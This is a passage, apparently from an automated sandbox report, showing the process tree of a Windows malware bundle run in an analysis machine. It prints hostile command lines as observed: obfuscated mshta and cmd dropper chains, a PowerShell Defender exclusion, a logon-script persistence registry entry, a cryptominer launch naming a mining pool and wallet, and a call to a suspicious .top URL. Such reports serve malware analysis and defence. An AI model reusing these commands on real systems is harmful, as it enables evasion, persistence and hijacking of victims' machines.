                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Checks whether UAC is enabled
                                                                        • Drops file in Program Files directory
                                                                        PID:4716
                                                                    • C:\Users\Admin\Documents\UU2WcgaKtRZHwABVSwfn4BEo.exe
                                                                      "C:\Users\Admin\Documents\UU2WcgaKtRZHwABVSwfn4BEo.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Checks BIOS information in registry
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3824
                                                                    • C:\Users\Admin\Documents\hXKL0Uq2VBdJW9u4wna9r5Sw.exe
                                                                      "C:\Users\Admin\Documents\hXKL0Uq2VBdJW9u4wna9r5Sw.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      • Checks BIOS information in registry
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2792
                                                                    • C:\Users\Admin\Documents\9X3AAy63MCUWvyCD5fEF4K1z.exe
                                                                      "C:\Users\Admin\Documents\9X3AAy63MCUWvyCD5fEF4K1z.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:4492
                                                                    • C:\Users\Admin\Documents\6ZjT21EfJOjHZRveuItkXmAx.exe
                                                                      "C:\Users\Admin\Documents\6ZjT21EfJOjHZRveuItkXmAx.exe"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:1152
                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                        C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\6ZJT21~1.DLL,s C:\Users\Admin\DOCUME~1\6ZJT21~1.EXE
                                                                        3⤵
                                                                        • Loads dropped DLL
                                                                        PID:1252
                                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\6ZJT21~1.DLL,OBMlS04xMmVt
                                                                          4⤵
                                                                            PID:8276
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\6ZJT21~1.DLL
                                                                              5⤵
                                                                                PID:1152
                                                                              • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\6ZJT21~1.DLL,lVNBT2xx
                                                                                5⤵
                                                                                  PID:8520
                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                    C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 17897
                                                                                    6⤵
                                                                                      PID:8928
                                                                                      • C:\Windows\system32\ctfmon.exe
                                                                                        ctfmon.exe
                                                                                        7⤵
                                                                                          PID:4440
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpC608.tmp.ps1"
                                                                                      5⤵
                                                                                        PID:9136
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\6KVjl3lodolGaFxH0f1jBFf8.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\6KVjl3lodolGaFxH0f1jBFf8.exe" ) do taskkill -IM "%~nXW" -f
                                                                                1⤵
                                                                                  PID:3932
                                                                                  • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                    WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3856
                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                      "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                      3⤵
                                                                                        PID:4444
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                          4⤵
                                                                                            PID:5336
                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                          "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                          3⤵
                                                                                            PID:5760
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill -IM "6KVjl3lodolGaFxH0f1jBFf8.exe" -f
                                                                                          2⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3752
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-JN9KL.tmp\9X3AAy63MCUWvyCD5fEF4K1z.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-JN9KL.tmp\9X3AAy63MCUWvyCD5fEF4K1z.tmp" /SL5="$1029A,138429,56832,C:\Users\Admin\Documents\9X3AAy63MCUWvyCD5fEF4K1z.exe"
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        PID:4664
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-BEAJR.tmp\Setup.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-BEAJR.tmp\Setup.exe" /Verysilent
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in Program Files directory
                                                                                          PID:4260
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5360
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-5DKDF.tmp\Stats.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-5DKDF.tmp\Stats.tmp" /SL5="$10382,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              PID:5696
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-UGC59.tmp\builder.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-UGC59.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                                                5⤵
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:4796
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5388
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 992
                                                                                              4⤵
                                                                                              • Program crash
                                                                                              PID:6888
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1044
                                                                                              4⤵
                                                                                              • Program crash
                                                                                              PID:5756
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1300
                                                                                              4⤵
                                                                                              • Program crash
                                                                                              PID:6704
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 1448
                                                                                              4⤵
                                                                                              • Program crash
                                                                                              PID:8016
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5428
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-3SD5I.tmp\Inlog.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-3SD5I.tmp\Inlog.tmp" /SL5="$10384,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              PID:5880
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-8627T.tmp\Setup.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-8627T.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                5⤵
                                                                                                  PID:4672
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-TSMUA.tmp\Setup.tmp
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-TSMUA.tmp\Setup.tmp" /SL5="$20562,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-8627T.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                    6⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Drops file in Program Files directory
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    PID:4416
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-D5KNE.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                      7⤵
                                                                                                        PID:6428
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          8⤵
                                                                                                            PID:6288
                                                                                                          • C:\Windows\SysWOW64\expand.exe
                                                                                                            expand C:\Users\Admin\AppData\Local\Temp\is-D5KNE.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                            8⤵
                                                                                                            • Drops file in Windows directory
                                                                                                            PID:4008
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                          7⤵
                                                                                                            PID:6184
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                              8⤵
                                                                                                                PID:8312
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-D5KNE.tmp\{app}\vdi_compiler.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-D5KNE.tmp\{app}\vdi_compiler"
                                                                                                              7⤵
                                                                                                                PID:4576
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-D5KNE.tmp\{app}\vdi_compiler.exe"
                                                                                                                  8⤵
                                                                                                                    PID:10396
                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                      ping localhost -n 4
                                                                                                                      9⤵
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:8916
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                  7⤵
                                                                                                                    PID:7468
                                                                                                                  • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                    "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                    7⤵
                                                                                                                      PID:9712
                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Enumerates connected drives
                                                                                                              • Modifies system certificate store
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              PID:5476
                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586627 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                                4⤵
                                                                                                                  PID:7100
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                3⤵
                                                                                                                  PID:5556
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-M1RQC.tmp\VPN.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-M1RQC.tmp\VPN.tmp" /SL5="$1039A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                    4⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    PID:5788
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-AT709.tmp\Setup.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-AT709.tmp\Setup.exe" /silent /subid=720
                                                                                                                      5⤵
                                                                                                                        PID:4344
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-BQIL8.tmp\Setup.tmp
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-BQIL8.tmp\Setup.tmp" /SL5="$303D8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-AT709.tmp\Setup.exe" /silent /subid=720
                                                                                                                          6⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          • Modifies system certificate store
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          PID:5992
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                            7⤵
                                                                                                                              PID:2412
                                                                                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                tapinstall.exe remove tap0901
                                                                                                                                8⤵
                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                PID:7236
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                              7⤵
                                                                                                                                PID:6200
                                                                                                                                • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                  tapinstall.exe install OemVista.inf tap0901
                                                                                                                                  8⤵
                                                                                                                                    PID:9092
                                                                                                                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                  7⤵
                                                                                                                                    PID:7980
                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                    7⤵
                                                                                                                                      PID:4252
                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5868
                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks computer location settings
                                                                                                                              PID:5776
                                                                                                                              • C:\Users\Admin\Documents\DsAkTrqu4_qIqlaXmS1rye5B.exe
                                                                                                                                "C:\Users\Admin\Documents\DsAkTrqu4_qIqlaXmS1rye5B.exe"
                                                                                                                                4⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:6480
                                                                                                                                • C:\Users\Admin\Documents\DsAkTrqu4_qIqlaXmS1rye5B.exe
                                                                                                                                  "C:\Users\Admin\Documents\DsAkTrqu4_qIqlaXmS1rye5B.exe"
                                                                                                                                  5⤵
                                                                                                                                    PID:6940
                                                                                                                                • C:\Users\Admin\Documents\lj_Fc2POAtb5yksuD8jWcoby.exe
                                                                                                                                  "C:\Users\Admin\Documents\lj_Fc2POAtb5yksuD8jWcoby.exe"
                                                                                                                                  4⤵
                                                                                                                                    PID:6628
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 760
                                                                                                                                      5⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:7880
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 812
                                                                                                                                      5⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:7476
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 784
                                                                                                                                      5⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:6972
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 856
                                                                                                                                      5⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:7680
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 792
                                                                                                                                      5⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:6416
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 988
                                                                                                                                      5⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:7680
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 1072
                                                                                                                                      5⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5496
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 1352
                                                                                                                                      5⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5424
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 1320
                                                                                                                                      5⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:8244
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 1412
                                                                                                                                      5⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:9160
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 1512
                                                                                                                                      5⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:8864
                                                                                                                                  • C:\Users\Admin\Documents\Gb91IZppuGIYGDdzBncoastb.exe
                                                                                                                                    "C:\Users\Admin\Documents\Gb91IZppuGIYGDdzBncoastb.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    PID:6620
                                                                                                                                  • C:\Users\Admin\Documents\S9B4MJMq8_RnvnMlb_qktuum.exe
                                                                                                                                    "C:\Users\Admin\Documents\S9B4MJMq8_RnvnMlb_qktuum.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    PID:6612
                                                                                                                                  • C:\Users\Admin\Documents\erEmdgTEnBWfOIjsNTpF1sYN.exe
                                                                                                                                    "C:\Users\Admin\Documents\erEmdgTEnBWfOIjsNTpF1sYN.exe"
                                                                                                                                    4⤵
                                                                                                                                      PID:6604
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 660
                                                                                                                                        5⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:2324
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 644
                                                                                                                                        5⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:1992
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 724
                                                                                                                                        5⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:6516
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 720
                                                                                                                                        5⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:5176
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 1068
                                                                                                                                        5⤵
                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                        • Program crash
                                                                                                                                        PID:7572
                                                                                                                                    • C:\Users\Admin\Documents\Sh8XBbcyHfiZN5ZJTbj7G7ee.exe
                                                                                                                                      "C:\Users\Admin\Documents\Sh8XBbcyHfiZN5ZJTbj7G7ee.exe"
                                                                                                                                      4⤵
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      PID:6596
                                                                                                                                    • C:\Users\Admin\Documents\HSLf8ZXxYxRjjAEcc5_uJacX.exe
                                                                                                                                      "C:\Users\Admin\Documents\HSLf8ZXxYxRjjAEcc5_uJacX.exe"
                                                                                                                                      4⤵
                                                                                                                                        PID:6588
                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                          "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\HSLf8ZXxYxRjjAEcc5_uJacX.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\HSLf8ZXxYxRjjAEcc5_uJacX.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                          5⤵
                                                                                                                                            PID:5372
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\HSLf8ZXxYxRjjAEcc5_uJacX.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\HSLf8ZXxYxRjjAEcc5_uJacX.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                              6⤵
                                                                                                                                                PID:4140
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill -IM "HSLf8ZXxYxRjjAEcc5_uJacX.exe" -f
                                                                                                                                                  7⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:3500
                                                                                                                                          • C:\Users\Admin\Documents\kAJ5pXHZF2gxd_4PeDzJ4Yq2.exe
                                                                                                                                            "C:\Users\Admin\Documents\kAJ5pXHZF2gxd_4PeDzJ4Yq2.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            PID:6580
                                                                                                                                          • C:\Users\Admin\Documents\Z1dZuFYFS7ufQ8bpUVcWzie9.exe
                                                                                                                                            "C:\Users\Admin\Documents\Z1dZuFYFS7ufQ8bpUVcWzie9.exe"
                                                                                                                                            4⤵
                                                                                                                                              PID:6572
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "Z1dZuFYFS7ufQ8bpUVcWzie9.exe" /f & erase "C:\Users\Admin\Documents\Z1dZuFYFS7ufQ8bpUVcWzie9.exe" & exit
                                                                                                                                                5⤵
                                                                                                                                                  PID:8976
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill /im "Z1dZuFYFS7ufQ8bpUVcWzie9.exe" /f
                                                                                                                                                    6⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:8268
                                                                                                                                              • C:\Users\Admin\Documents\Jyl6cPknznOElISuGqBoJFXD.exe
                                                                                                                                                "C:\Users\Admin\Documents\Jyl6cPknznOElISuGqBoJFXD.exe"
                                                                                                                                                4⤵
                                                                                                                                                  PID:6564
                                                                                                                                                • C:\Users\Admin\Documents\IO4B5Zi6DETQ7OK0_T2tNvOy.exe
                                                                                                                                                  "C:\Users\Admin\Documents\IO4B5Zi6DETQ7OK0_T2tNvOy.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  PID:6556
                                                                                                                                                  • C:\Users\Admin\Documents\IO4B5Zi6DETQ7OK0_T2tNvOy.exe
                                                                                                                                                    C:\Users\Admin\Documents\IO4B5Zi6DETQ7OK0_T2tNvOy.exe
                                                                                                                                                    5⤵
                                                                                                                                                      PID:5920
                                                                                                                                                  • C:\Users\Admin\Documents\BOgVczALrC4PmseiFmX_AoTc.exe
                                                                                                                                                    "C:\Users\Admin\Documents\BOgVczALrC4PmseiFmX_AoTc.exe"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:6548
                                                                                                                                                    • C:\Users\Admin\Documents\nx763MM6LEviHQbWNrFrMrv4.exe
                                                                                                                                                      "C:\Users\Admin\Documents\nx763MM6LEviHQbWNrFrMrv4.exe"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:6540
                                                                                                                                                      • C:\Users\Admin\Documents\LBQ5vCrMkyuYIJCDcWzaJKRS.exe
                                                                                                                                                        "C:\Users\Admin\Documents\LBQ5vCrMkyuYIJCDcWzaJKRS.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:6796
                                                                                                                                                      • C:\Users\Admin\Documents\RRTnuC5h5CrQRWtmmCjvr05t.exe
                                                                                                                                                        "C:\Users\Admin\Documents\RRTnuC5h5CrQRWtmmCjvr05t.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:6880
                                                                                                                                                        • C:\Users\Admin\Documents\RRTnuC5h5CrQRWtmmCjvr05t.exe
